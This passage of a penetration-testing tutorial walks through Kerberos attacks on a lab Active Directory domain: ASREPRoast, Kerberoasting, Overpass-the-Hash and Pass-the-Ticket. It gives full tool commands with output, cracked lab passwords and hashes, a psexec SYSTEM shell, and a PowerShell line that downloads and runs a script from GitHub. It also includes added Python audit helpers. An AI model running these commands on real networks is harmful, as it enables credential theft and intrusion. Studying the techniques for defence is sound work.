<p>To retrieve user accounts without Kerberos pre-authentication, the following LDAP filter can be used: <em>(&amp;(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))</em>. The <em>samAccountType</em> parameter restricts the query to user accounts, excluding computer accounts, and <em>userAccountControl</em> filters by Kerberos pre-authentication in this case.</p>
<h4>From Linux</h4>
<p>The script <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py" rel="nofollow">GetNPUsers.py</a> can be used from a Linux machine to harvest the non-preauth AS_REP responses. The following commands either use a given username list or, when domain credentials are provided, query the domain to obtain the list of users:</p>
<pre><code class="language-shell">root@kali:impacket-examples# python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[-] User trex doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User triceratops doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
root@kali:impacket-examples# cat hashes.asreproast 
$krb5asrep$23$velociraptor@JURASSIC.PARK:7c2e70d3d46b4794b9549bba5c6b728e$599da4e9b7823dbc8432c188c0cf14151df3530601ad57ee0bc2730e0f10d3f1552b3552cee9431cf3f1b119d099d3cead7ea38bc29d5d83074035a2e1d7de5fa17c9925c75aac2717f49baae54958ec289301a1c23ca2ec1c5b5be4a495215d42e9cbb2feb8b7f58fb28151ac6ecb0684c27f14ecc35835aecc3eec1ec3056d831dd518f35103fd970f6d082da0ebaf51775afa8777f783898a1fa2cea7493767024ab3688ec4fe00e3d08a7fb20a32c2abf8bdf66c9c42f49576ae9671400be01b6156b4677be4c79d807ba61f4703d9acda0e66befc5b442660ac638983680ffa3ada7eacabad0841c9aee586
</code></pre>
<pre><code class="language-shell">root@kali:impacket-examples# python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

Name          MemberOf                                       PasswordLastSet      LastLogon            UAC      
------------  ---------------------------------------------  -------------------  -------------------  --------
velociraptor  CN=Domain Admins,CN=Users,DC=jurassic,DC=park  2019-02-27 17:12:12  2019-03-18 11:44:04  0x410200 



root@kali:impacket-examples# cat hashes.asreproast 
$krb5asrep$23$velociraptor@JURASSIC.PARK:6602e01d59b4eeba815ab467194a9de4$b13a0e139b1daa46a457b3fa948c22cbbaad75a94c2b37064d757185d171c258e290210339d950b9245de6fa40a335986146a8c71c0b60f633b4c040141460a0a91737670f21caae6261ebde0151c06adceac22bfed84cb8c1f07948fb8e75b8a1d64c768c9e3f3a50d035ec03df643ea185648406b634b6fd673028e6e90ea429f57f9229b00f47f2bba2cdb7297d29b9f97a83d07c89dee7ea673340f64c443a213d5b9bbed969a68ca7a0ea41245b0fa985f64261803488b61821fbaedf43d50ea16075b2379bb354e4001d73dfd19cc8787b4bcd2bd9b542e0e2b1218ee8c16699c134ae5ec587afe0fd1880
</code></pre>
<p>After finishing the execution, the script will generate an output file with encoded AS_REP messages to crack using hashcat or John.</p>
<h4>From Windows</h4>
<p>Rubeus can be used to carry out this attack from a Windows machine. The following command will generate a file containing AS_REP messages of affected users:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3

[*] Action: AS-REP roasting

[*] Using domain controller: Lab-WDC01.jurassic.park (10.200.220.2)
[*] Building AS-REQ (w/o preauth) for: 'jurassic.park\velociraptor'
[*] Connecting to 10.200.220.2:88
[*] Sent 170 bytes
[*] Received 1423 bytes
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Users\triceratops\hashes.asreproast

[*] Roasted hashes written to : C:\Users\triceratops\hashes.asreproast

C:\Users\triceratops&gt;type hashes.asreproast
$krb5asrep$23$velociraptor@jurassic.park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
</code></pre>
<p>Once executed, Rubeus should have generated a file with one AS_REP per line. This file can be used to feed Hashcat or John.</p>
<h4>Cracking the AS_REP</h4>
<p>Finally, to crack the harvested AS_REP messages, Hashcat or John can be used. In this case a dictionary attack will be performed, but a variety of cracking techniques can be applied.</p>
<p>Hashcat command:</p>
<pre><code class="language-shell">root@kali:impacket-examples# hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-4210H CPU @ 2.90GHz, 2961/2961 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
Dictionary cache hit:
* Filename..: passwords_kerb.txt
* Passwords.: 3
* Bytes.....: 25
* Keyspace..: 3

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

$krb5asrep$23$velociraptor@jurassic.park:bbec05d876e5133f5ab0ceda07572fe0$4a826cd2123ebc266179a9009e867eaac03d1c8c9880acf76dca4b5919f967e86dbb6cd475da8ef5c83b1b8388d22da005ba10d5cb4d10f3c3f44c918acd5843660c4ff5c678e635f7751a109524d693db29bf75a5f0995b41cd35600b969fe371f77ad13f48604dfab87253d324e8f53c267a2299d2450245d317d319a4fd424b42f815b79e2dd16c58ab2a2c106eb6995aff70c8e889d8f170b35e78993157b3b3d13dcce18a720bc5810c474cbc95c07b5ffcee5ee06442fdb6244c33eeca4bfcd4f6c051a5f00c40a837a9644ada70a381a85089f05cfb5e5f03ab0c7525bba6aeaf9da3554d3d700dd54760:Sm4rtSp33d
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$velociraptor@jurassic.park:bbec05d876...d54760
Time.Started.....: Tue Mar  5 11:15:47 2019 (1 sec)
Time.Estimated...: Tue Mar  5 11:15:48 2019 (0 secs)
Guess.Base.......: File (passwords_kerb.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        4 H/s (0.18ms) @ Accel:64 Loops:1 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3/3 (100.00%)
Rejected.........: 0/3 (0.00%)
Restore.Point....: 0/3 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: above1 -&gt; below1

Started: Tue Mar  5 11:12:26 2019
Stopped: Tue Mar  5 11:15:48 2019
</code></pre>
<p>John command:</p>
<pre><code class="language-shell">root@kali:kali# john --wordlist=passwords_kerb.txt hashes.asreproast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidates left, minimum 16 needed for performance.
Sm4rtSp33d       ($krb5asrep$velociraptor@jurassic.park)
1g 0:00:00:00 DONE (2019-03-07 17:16) 20.00g/s 20.00p/s 20.00c/s 20.00C/s Sm4rtSp33d
Use the "--show" option to display all of the cracked passwords reliably
Session completed
</code></pre>
<p>In this case, luck is on our side, and the user password was contained in the dictionary.</p>
<h3>Kerberoasting</h3>
<p>The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline. More detail in <a href="https://www.tarlogic.com/blog/how-kerberos-works/">Kerberos theory</a>.</p>
<p>Therefore, to perform Kerberoasting, only a domain account that can request TGSs is necessary, which means any account, since no special privileges are required.</p>
<p>In order to retrieve user accounts which have associated services, the following LDAP filter can be used: <em>(&amp;(samAccountType=805306368)(servicePrincipalName=*))</em>. Parameter <em>samAccountType</em> allows filtering out the computer accounts, and <em>servicePrincipalName=*</em> filters by accounts with at least one service.</p>
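<p>What the two LDAP filters in this article select can be checked offline against exported directory entries, which is useful when auditing which accounts are exposed to ASREPRoast and Kerberoasting. The following is an added example, not code from the article or from Impacket: a small evaluator for the filter subset used here, including the 1.2.840.113556.1.4.803 bitwise-AND matching rule. The sample entries are constructed, with names and the 0x410200 value mirroring the lab output above, and the function names are hypothetical.</p>

```python
"""Evaluate the article's two LDAP filters against directory entries (audit aid)."""

BIT_AND = "1.2.840.113556.1.4.803"  # LDAP_MATCHING_RULE_BIT_AND: every bit of the value is set
BIT_OR = "1.2.840.113556.1.4.804"   # LDAP_MATCHING_RULE_BIT_OR: at least one bit is set

NO_PREAUTH_FILTER = ("(&(samAccountType=805306368)"
                     "(userAccountControl:1.2.840.113556.1.4.803:=4194304))")
USER_SPN_FILTER = "(&(samAccountType=805306368)(servicePrincipalName=*))"

UAC_FLAGS = {0x2: "ACCOUNTDISABLE", 0x200: "NORMAL_ACCOUNT",
             0x1000: "WORKSTATION_TRUST_ACCOUNT",
             0x10000: "DONT_EXPIRE_PASSWORD", 0x400000: "DONT_REQ_PREAUTH"}

# Constructed entries; names and the 0x410200 value mirror the article's lab output.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "velociraptor", "sAMAccountType": 805306368,
     "userAccountControl": 0x410200, "servicePrincipalName": ["cloner/labwws02"]},
    {"sAMAccountName": "triceratops", "sAMAccountType": 805306368,
     "userAccountControl": 0x200},
    {"sAMAccountName": "LABWWS02$", "sAMAccountType": 805306369,
     "userAccountControl": 0x1000, "servicePrincipalName": ["HOST/labwws02"]},
]


def parse(text):
    """Parse a subset of RFC 4515 (no escaped characters) into nested tuples."""
    text = text.strip()
    node, pos = _parse_at(text, 0)
    if pos != len(text):
        raise ValueError("trailing data after filter")
    return node


def _parse_at(s, i):
    if s[i:i + 1] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    i += 1
    op = s[i:i + 1]
    if op and op in "&|!":
        i, kids = i + 1, []
        while s[i:i + 1] == "(":
            kid, i = _parse_at(s, i)
            kids.append(kid)
        if s[i:i + 1] != ")" or not kids or (op == "!" and len(kids) != 1):
            raise ValueError(f"malformed '{op}' group at offset {i}")
        return (op, kids), i + 1
    end = s.find(")", i)
    if end == -1:
        raise ValueError("unterminated filter item")
    lhs, sep, value = s[i:end].partition("=")
    if not sep or not lhs:
        raise ValueError(f"malformed item at offset {i}")
    if lhs.endswith(":"):  # extensible match, written attr:oid:=value
        attr, _, rule = lhs[:-1].partition(":")
        if rule not in (BIT_AND, BIT_OR):
            raise ValueError(f"unsupported matching rule {rule!r}")
        return ("bits", attr.lower(), rule, int(value)), end + 1
    if value == "*":
        return ("present", lhs.lower()), end + 1
    return ("eq", lhs.lower(), value), end + 1


def matches(node, entry):
    """Evaluate a parsed filter against one entry whose keys are lower-case."""
    kind = node[0]
    if kind == "&":
        return all(matches(kid, entry) for kid in node[1])
    if kind == "|":
        return any(matches(kid, entry) for kid in node[1])
    if kind == "!":
        return not matches(node[1][0], entry)
    values = entry.get(node[1])
    if values is None:
        return False
    if not isinstance(values, list):
        values = [values]
    if kind == "present":
        return len(values) > 0
    if kind == "eq":
        return any(str(v).lower() == node[2].lower() for v in values)
    mask = node[3]
    if node[2] == BIT_AND:
        return any(int(v) & mask == mask for v in values)
    return any(int(v) & mask != 0 for v in values)


def decode_uac(value):
    """Name the userAccountControl bits this example knows about."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def audit(entries):
    """List the accounts each of the two filters selects."""
    lowered = [{key.lower(): val for key, val in e.items()} for e in entries]
    report = {}
    for label, text in (("no_preauth", NO_PREAUTH_FILTER), ("user_spn", USER_SPN_FILTER)):
        tree = parse(text)
        report[label] = [e["samaccountname"] for e in lowered if matches(tree, e)]
    return report
```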
<h4>From Linux</h4>
<p>From a Linux machine, it is possible to retrieve all the TGSs by using the impacket example <a href="https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py" rel="nofollow">GetUserSPNs.py</a>. The command required to perform the attack and save the TGSs into a file is the following:</p>
<pre><code class="language-shell">root@kali:impacket-examples# python GetUserSPNs.py jurassic.park/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

ServicePrincipalName  Name          MemberOf  PasswordLastSet      LastLogon           
--------------------  ------------  --------  -------------------  -------------------
cloner/labwws02       velociraptor            2019-02-27 17:12:12  2019-03-05 09:35:27 



root@kali:impacket-examples# cat hashes.kerberoast 
$krb5tgs$23$*velociraptor$JURASSIC.PARK$cloner/labwws02*$b127187aceb93774a985bb1e528da85c$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
</code></pre>
<p>Once finished, a file with a crackable TGS per line should have been generated as output. This file can be used to feed Hashcat or John in order to crack its TGS&#8217;s.</p>
<h4>From Windows</h4>
<p>Likewise, Kerberoasting can be performed from a Windows machine with several tools, such as Rubeus or Invoke-Kerberoast from the Empire project. In this case, the tools are launched from the context of a logged-on user inside a domain workstation. The commands are the following:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3

[*] Action: Kerberoasting

[*] SamAccountName         : velociraptor
[*] DistinguishedName      : CN=velociraptor,OU=Usuarios,DC=jurassic,DC=park
[*] ServicePrincipalName   : cloner/labwws02
[*] Hash written to C:\Users\triceratops\hashes.kerberoast

[*] Roasted hashes written to : C:\Users\triceratops\hashes.kerberoast

C:\Users\triceratops&gt;type hashes.kerberoast
$krb5tgs$23$*$jurassic.park$cloner/labwws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
</code></pre>
<p>Another way to accomplish Kerberoast is to use the powershell script <a href="https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" rel="nofollow">Invoke-Kerberoast</a> from <a href="https://github.com/EmpireProject/Empire" rel="nofollow">Empire</a> project, which can be loaded directly into memory:</p>
<pre><code class="language-shell">PS C:\Users\triceratops&gt; iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
PS C:\Users\triceratops&gt; Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
</code></pre>
<p>In the same way as impacket, these tools create output files with one crackable TGS per line, which can be used to feed Hashcat or John.</p>
<h4>Cracking the TGSs</h4>
<p>In this section, cracking examples of both Hashcat and John will be shown. However, there are several different cracking methods which can be applied in this situation. Next, a dictionary attack will be performed (the dictionary contains the password for demonstration purposes).</p>
<p>Hashcat command:</p>
<pre><code class="language-shell">root@kali:impacket-examples# hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt 
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-4210H CPU @ 2.90GHz, 2961/2961 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts &gt; length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll'
* Device #1: Kernel m13100_a0-pure.43809ab0.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: passwords_kerb.txt
* Passwords.: 3
* Bytes.....: 25
* Keyspace..: 3

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.  

$krb5tgs$23$*velociraptor$jurassic.park$cloner/labwws02*$60b2e176b7a641fd663bf1b8d0b6e106$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:Sm4rtSp33d
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*velociraptor$jurassic.park$cloner/labw...af98ff
Time.Started.....: Tue Mar  5 10:46:34 2019 (1 sec)
Time.Estimated...: Tue Mar  5 10:46:35 2019 (0 secs)
Guess.Base.......: File (passwords_kerb.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        4 H/s (0.16ms) @ Accel:64 Loops:1 Thr:64 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3/3 (100.00%)
Rejected.........: 0/3 (0.00%)
Restore.Point....: 0/3 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: above1 -&gt; below1

Started: Tue Mar  5 10:42:51 2019
Stopped: Tue Mar  5 10:46:35 2019
</code></pre>
<p>While using hashcat, an encoding problem arose: the tool displayed an error similar to <em>Byte Order Mark (BOM) was detected</em>, because the input file was encoded with Unicode (which is common in Windows output files) instead of ASCII. To solve this issue, the tool <em>dos2unix</em> can be used to convert the file to the correct encoding.</p>
<p>John command:</p>
<pre><code class="language-shell">root@kali:impacket-examples# john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sm4rtSp33d       (?)
1g 0:00:00:00 DONE (2019-03-05 10:53) 50.00g/s 150.0p/s 150.0c/s 150.0C/s above1..below1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
</code></pre>
<p>John was not able to show the username alongside the cracked password; instead, it displayed the symbol <em>(?)</em>. While this is enough in the case of just one TGS, it can get pretty annoying if several are going to be cracked.</p>
<p>After all, as shown above, it was possible to crack the password by using the correct dictionary with both tools.</p>
<h3>Overpass The Hash/Pass The Key (PTK)</h3>
<p>This attack aims to use the user's NTLM hash to request Kerberos tickets, as an alternative to the common Pass The Hash over the NTLM protocol. Therefore, this could be especially useful in networks where the NTLM protocol is disabled and only Kerberos is allowed as authentication protocol.</p>
<p>In order to perform this attack, the NTLM hash (or password) of the target user account is needed. Thus, once a user hash is obtained, a TGT can be requested for that account. Finally, it is possible to access any service or machine where the user account has permissions.</p>
<h4>From Linux</h4>
<p>From a Linux perspective, impacket can be used in order to perform this attack. Thus, the commands required for that purpose are the following:</p>
<pre><code class="language-shell">root@kali:impacket-examples# python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Saving ticket in velociraptor.ccache
root@kali:impacket-examples# export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
root@kali:impacket-examples# python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on labwws02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file yuiQeOUk.exe
[*] Opening SVCManager on labwws02.jurassic.park.....
[*] Creating service sBGq on labwws02.jurassic.park.....
[*] Starting service sBGq.....
[!] Press help for extra shell commands
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
nt authority\system

C:\Windows\system32&gt;
</code></pre>
<p>After generating and using the TGT, a shell is finally launched. The requested TGT can also be used with other impacket examples with parameter <em>-k</em>, and even with other tools (such as smbexec.py or wmiexec.py), because it is written to a ccache file, which is a widely used format for Kerberos tickets in Linux.</p>
<p>While writing the examples for this article, some problems arose:</p>
<ul>
<li><em>PyAsn1Error(&#8216;NamedTypes can cast only scalar values&#8217;,)</em> : Resolved by updating impacket to the latest version.</li>
<li><em>KDC can&#8217;t found the name</em> : Resolved by using the hostname instead of the IP address, because it was not recognized by Kerberos KDC.</li>
</ul>
<h4>From Windows</h4>
<p>In order to accomplish this attack from a Windows machine, it is possible to use Rubeus and PsExec as follows:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 2a3de7fe356ee524cc9f3d579f2e0aa7
[*] Using domain controller: Lab-WDC02.jurassic.park (10.200.220.3)
[*] Building AS-REQ (w/ preauth) for: 'jurassic.park\velociraptor'
[*] Connecting to 10.200.220.3:88
[*] Sent 237 bytes
[*] Received 1455 bytes
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFSDCCBUSgAwIBBaEDAgEWooIEVjCCBFJhggROMIIESqADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAg
      oAMCAQKhGTAXGwZrcmJ0Z3QbDWp1cmFzc2ljLnBhcmujggQMMIIECKADAgESoQMCAQKiggP6BIID9nUy
      VTaRmuyCOYJ/Fz0Z5We4crR6qWrxpEPDZHV09VmBp0GYWwUxwGM4M2hkbFJss6i0RG1NvKUy55D2loPI
      nKXSD5kwEjJeMsVAQWvvQCNuIrVu/XY9eGhL405ryVYNELdPxOuBNXYYZoQYLo1qxcoEkH/ag4QTnG7z
      6qH1o5RWwhmqMHNWp77LGu3lBWd0lb3t7d3pfGCU7hgWRvA390dQZ+Vzrcqfs5sHzoii8ondT9LqyvYI
      4P6DwhXH1wWOVhF9Sf23wUSG5iIZvbTrHuNZvFcPmUYXF2zd0Dtx+L3ovYdWaw+7HDmu4NPspvuAlG2x
      Jj/cbGS1KuCjAtSkT9XMVu0WEFY8gIbew35l8t5H7b+8fcjTyOLFJyMIuEzTjdfzdGJ8NYsqAxG0wCtd
      w4OCuqUUHuffwD4L27PC+fVVR7D5htfy6MbWVQrVqfgGIhqdC68I5COjyknobf+ksO9EDcn8+7zDUXtE
      dbt9XZtt0VTNyZUfSyOMGW+pkpB8wA3QjzahpgrLVE/8oHGAkFQ6sf/DOr0CYinn7iC8lJ1zZj1hcDa6
      Y+RVSARW4V++03uQPwtCN6mpuhIumikFCQsOTMQky8QKcsFGHdsCqySQsAoOtdWLHpuYFnaA0VDb3M+i
      4yc5286jaF6NRRPBZJEZnSTCRNwhJCR3bgO3C5bzWKFCOFMjFy5GOCZoZdYIbKiVABG2ZFUuyMedCDQQ
      YJrLO6oFoCL5Yeu2vrviFZUSpbUVZlxSDHnASuo1PUCfnm7oF3E6aw6/Q/0/dONSQzImXC7H+t2Z7ym5
      4pIzkgIZ/p5ODWfKr/XrrBUjmPPDzGyRUz9q1NKPv0SVi8sC5wkWAe1tipU5G582PrBWuS+Nv9XLAoKL
      +LR4iWnUw3o3/96IyCiHiCGy/g1DLJehxb5/wxDxwrnpDW50kFs7bwFrbD+8qWwd8apZF/iiUyzRYJAu
      jDOTyfJtZ7Vm2mOwSm1KeUboZ3u9StIkNUbmjR/wXvwmvUCXDppO/LeMT9w5uejGNVr+QRLPL+brAkbB
      GHFoSTR0/L6k1+8vkJzAJCOA3Yir3JJd8xRdnad4Q7Pl67CjsGKrJddt6iBzoHKPabQ/SbDVIV4veMX7
      5KtcYHM8E2CvV2sV8KD1QIOSo00Ya/C/EUekjWsG3YGW7UulxDwb95mDRf6ntr7jMBC8G2jd49IuJcWR
      QTDFuys4L/NsEAqLo5RPNk6bz1SpjpWlmG95hRg5DAe1M+u8aRD6NDs3A8fH6b7fZkQ+1I/Xl5sBhfTt
      7FGbTI4mG+VlEHbJpl47KTAO+jJgYj3m0/vgcwBlO4lCMFucB3B488VEamPJU3M66hMOy6OB3TCB2qAD
      AgEAooHSBIHPfYHMMIHJoIHGMIHDMIHAoBswGaADAgEXoRIEEFg+Y8LhMIWpLiabLQKBdBihDxsNSlVS
      QVNTSUMuUEFSS6IZMBegAwIBAaEQMA4bDHZlbG9jaXJhcHRvcqMHAwUAQOEAAKURGA8yMDE5MDIyODEx
      NTc1N1qmERgPMjAxOTAyMjgyMTU3NTdapxEYDzIwMTkwMzA3MTE1NzU3WqgPGw1KVVJBU1NJQy5QQVJL
      qSIwIKADAgECoRkwFxsGa3JidGd0Gw1qdXJhc3NpYy5wYXJr

[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Users\triceratops&gt;.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\velociraptor

C:\Windows\system32&gt;
</code></pre>
<p>If the <em>/ptt</em> parameter is not passed to <em>Rubeus asktgt</em>, the ticket will be shown in base64. The following PowerShell command can be used to write it to a file:</p>
<pre><code class="language-shell">[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("&lt;base64 ticket&gt;"))
</code></pre>
<p>As this is a little cumbersome, I expect that the program will automatically save the ticket in future versions. After that, the command <code>Rubeus ptt /ticket:</code> can be used to inject that ticket.</p>
<h3>Pass The Ticket (PTT)</h3>
<p>This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner. The way of collecting these tickets differs between Linux and Windows machines, so each process is introduced in its own section.</p>
<h4>Harvesting tickets from Linux</h4>
<p>On Linux, tickets are stored in credential caches or ccaches. There are 3 main types, which indicate where tickets can be found:</p>
<ul>
<li>Files, by default under /tmp directory, in the form of krb5cc_%{uid}.</li>
<li>Kernel keyrings, a special space in the Linux kernel provided for storing keys.</li>
<li>Process memory, used when only one process needs to use the tickets.</li>
</ul>
<p>To verify which type of storage is used on a specific machine, check the <em>default_ccache_name</em> variable in the /etc/krb5.conf file, which by default is readable by any user. If this parameter is missing, its default value is <em>FILE:/tmp/krb5cc_%{uid}</em>.</p>
<p>Hence, tickets are usually saved in files, which can only be read by the owner and, like any file in Linux, by root. With access to those ticket files, simply copying them to another machine is enough to use them in Pass The Ticket attacks.</p>
<p>Example of tickets in a Linux server:</p>
<pre><code class="language-shell">[root@Lab-LSV01]# ls -lah /tmp/krb5*
-rw-------. 1 root         root         1.4K Mar  5 16:25 /tmp/krb5cc_0
-rw-------. 1 trex         domain users 1.2K Mar  7 10:08 /tmp/krb5cc_1120601113_ZFxZpK
-rw-------. 1 velociraptor domain users  490 Mar  7 10:14 /tmp/krb5cc_1120601115_uDoEa0
</code></pre>
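<p>Because file ccaches are protected only by their permissions, a host audit can check both points above: which storage type krb5.conf selects, and whether any <em>krb5cc_*</em> file is accessible to someone other than its owner. The following is an added example, not code from the original article; the function names and the temporary directory it builds are assumptions made for the illustration.</p>

```python
import os
import re
import stat
import tempfile

# Value the article gives for an unset default_ccache_name.
DEFAULT_CCACHE = "FILE:/tmp/krb5cc_%{uid}"

# Constructed krb5.conf fragment; the KEYRING value mirrors the tickey output.
SAMPLE_KRB5_CONF = """\
# constructed sample
[libdefaults]
    default_realm = JURASSIC.PARK
    default_ccache_name = KEYRING:session:sess_%{uid}
[realms]
    JURASSIC.PARK = {
        kdc = lab-wdc02.jurassic.park
    }
"""


def ccache_setting(krb5_conf_text):
    """Return default_ccache_name from [libdefaults], or the default."""
    section = None
    for raw in krb5_conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        header = re.fullmatch(r"\[(\w+)\]", line)
        if header:
            section = header.group(1)
        elif section == "libdefaults" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key == "default_ccache_name":
                return value
    return DEFAULT_CCACHE


def storage_type(ccache_name):
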